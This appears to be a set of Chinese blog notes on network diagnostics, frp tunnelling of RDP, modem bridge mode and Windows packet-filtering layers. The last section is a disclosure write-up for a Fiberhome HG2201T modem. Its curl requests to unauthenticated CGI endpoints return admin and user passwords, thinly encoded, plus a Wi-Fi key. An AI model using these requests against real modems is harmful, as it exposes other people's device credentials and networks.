network

这里介绍一些常用的网络诊断、链路质量评估工具。 PING ping 是最常用的基于 ICMP Echo 协议的链路诊断工具，Windows 和 Linux 平台都有该工具。 ping 8.8.8.8 路由跟踪 路由跟踪是基于 IP 协议 TTL 限制触发 ICMP 错误实现的一种链路路径探测器。可以找出 IP 数据包和模板间经过的路由器地址。 Windows 的路由跟踪指令是 tracert。 tracert 8.8.8.8 Linux 上是 traceroute tarceroute 8.8.8.8 带宽测试 可以用于 TCP、UDP 协议带宽测试的工具有 iperf3 https://iperf.fr/。 iperf3 需要客户端和服务端同时运行。 服务端 iperf3 -s 客户端 iperf3 -c x.x.x.x 同类工具还有 dperf https://github.com/baidu/dperf netperf https://github.com/HewlettPackard/netperf qperf https://github.com/linux-rdma/qperf。 psping 微软的工具包 PSTools 中提供了 psping 工具用于测试 TCP 协议延迟。 psping www.google.com:443 也可以测试 UCP 协议 psping -u 8....

https://github.com/fatedier/frp frp 用法很多，这里主要用做内网穿透。 内网穿透 首先需要一个中转服务器，用于公开内网服务。 中转服务器配置 [common] bind_port = 4700 服务端配置 [common] server_addr = x.x.x.x server_port = 7000 [rdp] type = stcp sk = xxx local_ip = 127.0.0.1 local_port = 3389 客户机配置 [common] server_addr = x.x.x.x server_port = 7000 [rdp_visitor] type = stcp role = visitor server_name = rdp sk = xxx bind_addr = 127.0.0.1 bind_port = 6000 Docker docker run --restart=always --network host -d -v /etc/frp/frps.ini:/etc/frp/frps.ini --name frps snowdreamtech/frps docker run --restart=always --network host -d -v /etc/frp/frpc....

为什么要改桥接 电信给的光猫太烂，路由性能太差。 配置 设备是 华为 HS8145C。 一般光猫会有两套 WEB 后台，一个是给用户的， 一个是给内部配置的。 改桥接需要进入内部后台，一般在 8080 端口，如 http://192.168.1.1:8080/。 以前的光猫需要破解超级管理员密码才能用，参考 电信光猫 - 烽火 HG2201T 敏感信息泄露。 后来改的人多了，电信直接把权限降到普通用户就能改了，省去了破解的麻烦。 通过配置向导，直接就可以修改。 非常简单！

包过滤技术 Windows 经过微软多年迭代，为开发者提供了多种网络包过滤技术，包括 user-mode 和 kernel-mode 的不同系统层级下的过滤技术。 Raw Socket 微软在 Winsock 2 后提供了原始套接字（Raw Socket）功能，和 Linux 类似，原始套接字可以在用户态接受所有经过 Winsock 的 IP 协议数据包。但是这种方法只能进行监听，而不能过滤和拦截。并且对于不经过 Winsock 的网络流量，不能被这个层次侦听。如通过传输驱动程序接口（TDI，Transport Driver Interface）通信的流量。 Winsock DLL 如果需要在 Winsock 层次实现过滤和，可以选择修改系统 Winsock DLL 文件，或者动态 HOOK Winsock 相关函数。但是同样的，无法接触到 Winsock 之外的网络流量。 LSP / SPI 在 Winsock 2 中，微软除了提供了 Socket API 还通过分层服务提供者（LSP，Layered Service Provider）提供了一个 Winsock 服务提供接口（SPI，Service Provider Interface），通过 LSP 可以向其他应用程序提供包传输和名称解析等服务。其他程序可以通过 ws2_32.dll 和 LSP 程序进行通信。 通过 LSP 提供的分层协议、基础协议来替换 Winsock 的默认协议，并用协议链重组重新串联数据包通道。这样就可以通过 LSP 实现 Winsock 包流量过滤和拦截。 Windows 2000 Packet Filtering Interface 微软在 Windows 2000 中提供了一个特别的网络包过滤接口，可以实现 IP 和端口的过滤。...

备份信息中可以泄露了超级密码，需要简单解密 curl http://192.168.1.1:8080/cgi-bin/login.htm.cgi # 管理后台 curl http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi # 备份信息 curl http://192.169.1.1:8080/cgi-bin/baseinfo.cgi # 设备信息 返回结果 { "RETURN": { "success": true }, "BASEINFOSET": { "baseinfoSet_INTERNETMAC": "XX:XX:XX:51:7C:C0", "baseinfoSet_TR069MAC": "XX:XX:XX:51:7c:c1", "baseinfoSet_VOIPMAC": "XX:XX:XX:51:7c:c2", "baseinfoSet_PRIPROTOCOLMAC": "XX:XX:XX:51:7c:c3", "baseinfoSet_WLANMAC": "XX:XX:XX:51:7c:cd", "baseinfoSet_PONMAC": "XX:XX:XX:51:7c:cf", "baseinfoSet_INTERNETEN": "1", "baseinfoSet_TR069EN": "1", "baseinfoSet_VOIPEN": "1", "baseinfoSet_PRIPROTOCOLEN": "1", "baseinfoSet_PONEN": "", "baseinfoSet_TELECOMACCOUNT": "telecomadmin", "baseinfoSet_TELECOMPASSWORD": "120&105&112&105&103&115&113&101&104&113&109&114&49&50&50&54&51&55&49&48&", "baseinfoSet_USERACCOUNT": "useradmin", "baseinfoSet_USERPASSWORD": "104&116&111&107&54&56&51&53&54&56&51&53&", "baseinfoSet_MANUFACTUREROUI": "XXXXXX", "baseinfoSet_DEVICESERIALNUMBER": "XXXXXX-3C846XXXXXX517CC0", "baseinfoSet_Compiletime": "23:36:36 Jan 25 2018", "baseinfoSet_SOFTWAREVERSION": "V1.00.M5002", "baseinfoSet_EXTNUMBER": "RP000000", "baseinfoSet_HARDWAREVERSION": "V2.1", "baseinfoSet_HARDWARECODE": "WKE7.200.400R1A", "baseinfoSet_SSID": "ChinaNet-Code", "baseinfoSet_WPAKEY": "JavaIsBest1024Code!...